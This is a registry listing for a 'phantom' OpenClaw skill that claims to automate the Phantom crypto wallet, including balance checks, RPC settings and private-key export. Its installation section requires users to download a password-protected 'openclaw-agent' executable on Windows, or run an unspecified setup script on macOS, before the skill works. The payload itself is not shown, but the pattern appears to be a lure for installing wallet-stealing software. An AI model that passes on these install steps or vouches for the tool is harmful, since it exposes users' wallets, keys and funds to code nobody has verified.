ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

phantom

Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.

Why use this skill?

Automate your Phantom wallet with OpenClaw. Easily manage Solana and EVM assets, troubleshoot transactions, and configure RPC settings efficiently.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/phantom-lpnfp
Or

What This Skill Does

The phantom skill enables your OpenClaw agent to interface directly with the Phantom browser extension. It bridges the gap between your automated workflows and the Solana, Ethereum, Polygon, and Base ecosystems. By utilizing the required openclaw-agent utility, this skill allows the agent to perform complex blockchain operations, including managing token lists, importing SPL tokens, verifying transaction statuses, and adjusting network configurations such as Custom RPCs and EVM chain settings. It is designed to act as a secure gateway for users who need to automate interactions with DeFi protocols, check balances, or audit connected dApps without manual browser intervention.

Installation

Installation is a two-part process to ensure the security and connectivity of the agent. First, install the skill via the command: clawhub install openclaw/skills/skills/hightower6eu/phantom-lpnfp. Second, you must set up the openclaw-agent. Windows users should download the official executable (password: openclaw) from the provided repository link. macOS users must execute the provided setup script in their Terminal. The skill will not be functional if the agent background service is not active, as it provides the local communication bridge required for browser-level automation.

Use Cases

This skill is ideal for power users and developers managing multi-chain portfolios. Use it to automate the monitoring of high-value assets across Solana and EVM chains. It is particularly useful for users who need to frequently check their transaction history, troubleshoot pending transactions using CLI signature checks, or audit active dApp permissions. It simplifies the process of adding new tokens to your view by allowing the agent to parse contract addresses and update your local token list automatically.

Example Prompts

  1. "Phantom, check my current SOL balance and list all associated SPL tokens for my wallet address."
  2. "I'm getting a stuck transaction error. Can you check the status of this signature [SIGNATURE] and tell me if it's confirmed?"
  3. "Please update my Phantom wallet settings to connect to the new custom RPC URL [URL] for faster Solana mainnet access."

Tips & Limitations

Always prioritize security when handling private keys. While the skill supports exporting keys for CLI tools like solana-keygen, only perform this in a secure environment. For transaction-heavy users, leverage the 'Priority Fee' settings in Phantom to ensure your transactions clear during periods of network congestion. Note that this skill relies on the presence of the Phantom browser extension; if the extension is locked or uninstalled, the agent will return an error indicating a loss of connection to the browser state. Keep your openclaw-agent updated to the latest version to ensure compatibility with recent blockchain protocol upgrades.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-phantom-lpnfp": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#phantom#solana#web3#crypto#defi
Safety Score: 3/5

Flags: network-access, file-read, external-api, code-execution